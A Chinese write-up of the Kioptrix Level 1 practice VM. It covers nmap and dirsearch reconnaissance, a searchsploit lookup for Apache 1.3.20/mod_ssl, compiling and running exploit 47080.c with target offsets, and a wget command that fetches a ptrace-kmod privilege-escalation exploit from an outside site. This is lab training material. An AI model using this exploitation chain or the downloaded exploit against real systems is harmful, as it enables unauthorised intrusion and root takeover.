当前位置: 首页 > news >正文

Kioptrix Level1

news 2025/6/29 7:41:59

靶机截图

收集信息

主机发现

靶机地址为10.4.7.221

nmap -sP 10.4.7.0/24

端口扫描

nmap -sS -O -sV -p- 10.4.7.221

PORT

STATE

SERVICE

VERSION

22/tcp

open

ssh

OpenSSH 2.9p2 (protocol 1.99)

80/tcp

open

http

Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp

open

rpcbind

2 (RPC #100000)

443/tcp

open

Apache/1.3.20 (Unix)

Apache httpd 2.0.52 ((CentOS))

139/tcp

open

netbios-ssn

Samba smbd (workgroup: MYGROUP)

1024/tcp

open

status

1 (RPC #100024)

系统版本为linux 2.4.9-2.4.18

web指纹

目录扫描

dirsearch -u http://10.4.7.221

访问下随便点点看到有Apache的版本

渗透过程

根据上面的信息,搜一下exp

searchsploit Apache 1.3.20

看着都像,一个一个试试

前两个都编译不成功,47080.c可以编译。

显示很多过滤下,前面得知为redhat,那么咱们就试下0x6a和0x6b

0x6a不行

试试0x6b,ok没毛病

提权

根据提示去下载

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

下载成功后传至靶机进行编译

总结

1.exp利用

http://www.lqws.cn/news/553969.html

相关文章:

  • 第十节:Vben Admin 最新 v5.0 (vben5) 快速入门 - 菜单管理(下)
  • 从台式电脑硬件架构看前后端分离开发模式
  • 数字孪生技术引领UI前端设计新革命:实时交互与模拟预测
  • 【Elasticsearch】全文检索 组合检索
  • 基于多径信道的分集接收技术性能优化与仿真分析
  • 单端反激变换器MATLAB仿真设计方案
  • 开源AI大模型驱动下的“信息找人“范式变革:AI智能名片与S2B2C商城小程序源码的技术重构
  • vue3中实现高德地图地址搜索自动提示(附源码)
  • WHERE 子句中使用子查询:深度解析与最佳实践
  • 【论文阅读笔记】知网SCI——基于主成分分析的空间外差干涉数据校正研究
  • 【JavaSE】Comparable和Comparator接口
  • Bootstrap 5学习教程,从入门到精通,Bootstrap 5 Flex 布局语法知识点及案例(27)
  • 华为云镜像仓库下载 selenium/standalone-chrome 镜像
  • 使用Docker安装MySQL和Nginx
  • 深入详解:随机森林算法——概念、原理、实现与应用场景
  • 8. 【Vue实战--孢子记账--Web 版开发】-- 账户账本管理
  • ESP-IDF中通过红外遥控RMT点亮WS2812(3)
  • web网页开发,在线%旅游景点管理%系统demo,基于Idea,vscode,html,css,vue,java,maven,springboot,mysql
  • 【Docker基础】Docker容器管理:docker top及其参数详解
  • 【力扣 中等 C】79. 单词搜索
  • HarmonyOS NEXT仓颉开发语言实战案例:图片预览器
  • 东南亚 TikTok 直播网络专线,专线助力告别直播画面卡顿时代
  • 某省职业院校技能大赛 高职组“信息安全管理与评估”赛项第二部分:应急响应
  • Word之空白页删除2
  • Note2.3 机器学习:Adaptive Learning Rate
  • 顺序表的常见算法
  • Qt 收藏夹书签管理
  • Qt的UDP接收过一段时间后就收不到数据,readyRead() 信号不触发的彻底解决方法
  • Python 数据分析:numpy,抽提,整数数组索引
  • 鸿蒙5:其他布局容器